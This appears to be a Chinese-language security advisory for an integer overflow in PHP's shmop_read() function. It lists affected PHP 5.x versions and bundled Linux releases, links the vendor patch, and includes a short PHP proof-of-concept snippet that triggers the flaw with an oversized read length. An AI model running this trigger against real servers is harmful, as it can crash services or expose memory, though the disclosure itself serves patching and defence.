PHP ‘shmop_read()’远程整数溢出漏洞

漏洞起因
边界条件错误
危险等级

 
影响系统
PHP PHP 5.3.5 
PHP PHP 5.3.2 
PHP PHP 5.3.1 
PHP PHP 5.3 
PHP PHP 5.2.17 
PHP PHP 5.2.15 
PHP PHP 5.2.13 
PHP PHP 5.2.12 
PHP PHP 5.2.11 
PHP PHP 5.2.10 
PHP PHP 5.2.9 -2
PHP PHP 5.2.9 
PHP PHP 5.2.8 
PHP PHP 5.2.7 
PHP PHP 5.2.6 
PHP PHP 5.2.5 
PHP PHP 5.2.4 
PHP PHP 5.2.3 
PHP PHP 5.2.2 
PHP PHP 5.2.1 
+ Ubuntu Ubuntu Linux 7.04 sparc
+ Ubuntu Ubuntu Linux 7.04 powerpc
+ Ubuntu Ubuntu Linux 7.04 i386
+ Ubuntu Ubuntu Linux 7.04 amd64
PHP PHP 5.1.6 
+ Ubuntu Ubuntu Linux 6.10 sparc
+ Ubuntu Ubuntu Linux 6.10 powerpc
+ Ubuntu Ubuntu Linux 6.10 i386
+ Ubuntu Ubuntu Linux 6.10 amd64
PHP PHP 5.1.5 
PHP PHP 5.1.4 
PHP PHP 5.1.3 -RC1
PHP PHP 5.1.3 
PHP PHP 5.1.2 
+ Ubuntu Ubuntu Linux 6.06 LTS sparc
+ Ubuntu Ubuntu Linux 6.06 LTS powerpc
+ Ubuntu Ubuntu Linux 6.06 LTS i386
+ Ubuntu Ubuntu Linux 6.06 LTS amd64
PHP PHP 5.1.1 
PHP PHP 5.1 
PHP PHP 5.0.5 
PHP PHP 5.0.4 
PHP PHP 5.0.3 
+ Trustix Secure Linux 2.2 
PHP PHP 5.0.2 
PHP PHP 5.0.1 
PHP PHP 5.0 candidate 3
PHP PHP 5.0 candidate 2
PHP PHP 5.0 candidate 1
PHP PHP 5.0 .0
PHP PHP 5.3.4 RC1
PHP PHP 5.3.4
PHP PHP 5.3.3
PHP PHP 5.2.14
PHP PHP 5.2
+ Debian Linux 4.0 sparc
+ Debian Linux 4.0 s/390
+ Debian Linux 4.0 powerpc
+ Debian Linux 4.0 mipsel
+ Debian Linux 4.0 mips
+ Debian Linux 4.0 m68k
+ Debian Linux 4.0 ia-64
+ Debian Linux 4.0 ia-32
+ Debian Linux 4.0 hppa
+ Debian Linux 4.0 arm
+ Debian Linux 4.0 amd64
+ Debian Linux 4.0 alpha
+ Debian Linux 4.0
 
不受影响系统
PHP PHP 5.3.6
 
危害
远程攻击者可以利用漏洞可能以WEB权限执行代码。
 
攻击所需条件
攻击者必须访问PHP应用程序。
 
漏洞信息
PHP是一款流行的编程语言。
ext/shmop/shmop.c文件中提供的shmop_read php函数存在一个整数溢出,函数读取共享内存区域中给定偏移上的内存中给定的字节数。
 
测试方法
<?php
$shm_key = ftok(__FILE__, ‘t’);
$shm_id = shmop_open($shm_key, "c", 0644, 100);
$shm_data = shmop_read($shm_id, 1, 2147483647);
//if there is no segmentation fault past this point, we have 2gb of
memory!
echo $shm_data;
?>
 
厂商解决方案 
用户可参考如下供应商提供的安全公告获得补丁信息:
http://svn.php.net/viewvc/?view=revision&revision=309018
 
漏洞提供者
Jose Carlos Norte
  

发表评论?

0 条评论。

发表评论